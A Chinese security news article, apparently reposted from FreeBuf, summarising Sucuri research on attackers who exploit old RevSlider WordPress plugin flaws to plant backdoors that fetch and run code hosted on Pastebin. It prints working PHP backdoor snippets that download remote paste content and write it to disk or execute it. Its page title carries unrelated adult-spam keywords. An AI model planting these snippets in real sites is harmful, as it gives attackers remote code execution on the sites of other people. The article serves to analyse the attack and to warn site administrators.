压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

快速分享文本、代碼的網站Pastebin常常被黑客們用來分享自己的庫、竊取的數據和其他代碼，而現在它真的被用于黑客攻擊了。

安全研究人員曾發現黑客們通過Gmail 草稿、Evernote等平臺控制僵尸網絡，而且近日又發現一個新玩法 ：黑客利用流行的WordPress插件RevSlider的老版本漏洞傳播新的后門變種，使用Pastebin.com放置惡意軟件。下面就讓我們一起來看看黑客們的新創意吧。

另類后門

Sucuri公司近日發表了一篇博客，該博客詳細解釋了黑客是如何利用舊版本的RevSlider WordPress插件來傳播一種新型后門，而該后門利用Pastebin.com網站服務來托管惡意代碼文件。

惡意軟件高級研究員Denis Sinegubko在博客中寫道：

“這或多或少可以算得上是一個典型的后門。它從遠程服務器下載惡意代碼，并在受害網站上將這些惡意代碼保存到一個文件中，使其隨時可被執行。不過，比較有趣的一點是其遠程服務器的選擇，黑客既沒將惡意代碼文件托管在自己的網站，也不是肉雞網站，而是在最受歡迎的Web應用網站Pastebin.com上?！?/p>

攻擊者通過掃描目標網站來尋找含有漏洞的RevSlider插件。一旦發現，他們會利用RevSlider的另一個漏洞將后門代碼上傳到該網站。

if(array_keys($_GET)[0] == ‘up’){

$content = file_get_contents(“http://pastebin.com/raw.php?i=JK5r7NyS”);

if($content){unlink(‘evex.php’);

$fh2 = fopen(“evex.php”,’a’);

fwrite($fh2,$content);

fclose($fh2);

}}else{print “test”;}

關鍵后門代碼

這是一份稍微復雜點的后門樣本，是通過RevSlider漏洞上傳的：

從截圖中你可以看到這段代碼將一段經過Base64編碼的內容注入WordPress核心文件wp-links-opml.php中的$temp變量。以下是經過解密的$temp內容：

你可以看到它從Pastebin下載代碼并立即執行。但這次只有當攻擊者提供wp_nonce_once中的請求參數，也就是Pastebin的文章ID時才會運行。wp_nonce_once參數的使用使得管理員難以追蹤惡意代碼的具體地址（防止了網址被屏蔽），同時又增加了后門的靈活性———這樣它就能夠下載執行任何Pastebin上的代碼——哪怕是那些一開始不存在的代碼————只需要向wp-links-opml.php提供ID就行了。

FathurFreakz編碼器

印度尼西亞黑客們有一款編碼器與Pastebin配合默契。名字叫做PHP Encryptor by Yogyakarta Black Hat 或者是 by FathurFreakz。在 Pastebin.com網站上粘帖創建PHP代碼，軟件就會加密那個Pastebin網址，生成混淆后的代碼：

解密后：

function FathurFreakz($ct3){

xcurl(‘http://pastebin.com/download.php?i=’.code($ct3));

}

FathurFreakz(CODE);

這段代碼會下載執行Pastebin上的代碼（使用xcurl函數），ID在CODE常量中，并且經過加密。你可以看到另外一種Pastebin網址種類：download.php，基本上它跟raw.php一樣，但它提供HTTP頭，使得瀏覽器不會顯示內容，而是直接以文件形式下載。

經過解密的代碼（看起來他們超愛用Pastebin……）：

給站長們敲響警鐘

黑客在實時攻擊的時候大規模利用Pastebin網站，這給網站管理員敲響了警鐘，提示他們要時刻維護網站的CMS（內容管理系統）以防止插件被惡意利用。

就在幾周前，一款新型針對WordPress的惡意軟件SoakSoak，其主要攻擊手段也是通過RevSlider的漏洞，上傳一個后門，然后對所有使用相同服務器的網站進行感染。當時SoakSoak攻陷了約10萬個WordPress站。

文章來源：FreeBuf黑客與極客（FreeBuf.COM）